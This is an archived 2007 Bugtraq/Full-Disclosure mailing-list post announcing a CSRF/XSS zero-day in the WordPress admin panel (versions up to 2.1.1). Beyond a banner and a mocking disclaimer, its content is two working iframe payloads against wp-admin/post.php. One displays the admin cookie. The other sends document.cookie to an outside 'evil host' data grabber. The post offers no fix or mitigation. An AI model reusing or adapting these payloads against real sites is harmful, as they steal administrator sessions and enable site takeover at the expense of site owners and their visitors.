| To: | webappsec@securityfocus.com, bugtraq@securityfocus.com, vuln-dev@securityfocus.com, full-disclosure@lists.grok.org.uk |
|---|---|
| Subject: | WordPress AdminPanel CSRF/XSS - 0day |
| From: | SaMuschie <samuschie@yahoo.de> |
| Date: | Mon, 26 Feb 2007 21:50:57 +0100 (CET) |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| Domainkey-signature: | a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=xse77AfMkH3L86x6ky3jFHdcL6LZWHhDufl39ShJ4zNrbZr4dnzQwNgE3Cq42nzbHBs119noos2Za4w3AqqNqmfhEZFbAo3eDyyP3pr0NOyHk0PxxZqF9d6Br2rcPkOLP+d7MG2VbgL8VQk0+DQz5AXFoXqKATNYRxsFgiPbUAM= ; |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 +---------------------------------------------------------------------------+ | SaMuschie Research Labs proudly presents . . . | +---------------------------------------------------------------------------+ | Application: wordpress Version: <= 2.1.1 | | Vuln./Exploit Type: AdminPanel CSRF/XSS Status: 0day | +---------------------------------------------------------------------------+ | Discovered by: Samenspender Released: 20070226 | | SaMuschie Release Number: 1 | +---------------------------------------------------------------------------+ Exploit: Cookie in an Alert Box: <iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></iframe> +---------------------------------------------------------------------------+ | Lameness Disclaimer | +---------------------------------------------------------------------------+ | SaMuschie Research Labs was found to publish vulnerabilities within well | | known software products, which are easy to discover and exploit. | | | | SaMuschie researchers just spend a minimum of time and knowledge for each | | vulnerability. Hence readers of this advisory are requested not to ask | | any questions to the researchers.... they don't know the answer ;) | +---------------------------------------------------------------------------+ +---------------------------------------------------------------------------+ | EOF | +---------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h aFgDpHnxPP+/4Ot5bLBZy9Q= =/gS4 -----END PGP SIGNATURE----- ___________________________________________________________ Der frühe Vogel fängt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Re: [Full-disclosure] Firefox Cache Hack - Firefox History Hack redux, pdp (architect) |
|---|---|
| Next by Date: | XXS in script Phorum, c_r_ck |
| Previous by Thread: | Secunia Software Inspector OS Security Assessment problem, David ROBERT |
| Next by Thread: | XXS in script Phorum, c_r_ck |
| Indexes: | [Date] [Thread] [Top] [All Lists] |